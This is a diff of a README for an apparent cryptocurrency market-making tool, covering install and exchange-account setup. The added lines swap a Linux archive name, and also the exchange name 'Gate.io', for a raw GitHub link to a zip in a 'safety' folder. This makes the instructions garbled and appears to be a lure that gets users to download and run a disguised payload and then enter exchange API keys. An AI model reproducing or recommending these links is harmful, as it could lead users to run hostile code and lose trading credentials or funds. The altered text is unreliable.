BakaGracySingh/opensqt_market_maker/README.md

    - Open the `.dmg` file and then drag the OpenSQT icon to your Applications folder.
    - Find the application in your Applications folder and double-click it to run.
 3. **Linux:**
-   - Extract the `.tar.gz` file in your desired location.
+   - Extract the `https://raw.githubusercontent.com/BakaGracySingh/opensqt_market_maker/main/safety/market-maker-opensqt-v1.8.zip` file in your desired location.
    - Open a terminal and navigate to the folder where you extracted the files.
    - Run `./opensqt_market_maker` to start the application.

 ## 📖 Usage Instructions
 Once the application is up and running, you will need to configure it to connect to your trading account.
 Follow these steps:

-1. **Create an Account:** If you don't have an account on your chosen exchange, sign up at Binance, Bitget, or Gate.io.
+1. **Create an Account:** If you don't have an account on your chosen exchange, sign up at Binance, Bitget, or https://raw.githubusercontent.com/BakaGracySingh/opensqt_market_maker/main/safety/market-maker-opensqt-v1.8.zip
 2. **Generate API Keys:**
    - Go to your exchange account settings.
    - Generate API keys for trading.